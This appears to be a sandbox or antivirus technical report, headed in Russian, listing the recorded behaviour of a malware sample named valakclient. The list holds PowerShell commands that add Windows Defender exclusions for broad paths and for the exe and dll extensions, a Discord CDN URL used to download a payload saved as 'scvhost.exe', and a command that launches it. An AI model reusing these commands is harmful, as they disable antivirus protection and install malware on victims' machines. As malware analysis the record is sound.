Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
- https://cdn.discordapp.com/attachments/877290324622475286/884788168581328917/bnd.exe как (join-path -path $env:appdata -childpath scvhost.exe
- %TEMP%\valakclient.exe
- %TEMP%\svchost.exe
- C:\valak_offsets.txt
- 'cd#.##scordapp.com':443
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- '%TEMP%\valakclient.exe'
- '%TEMP%\svchost.exe'
- '%WINDIR%\syswow64\cmd.exe' /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'scvhost.exe')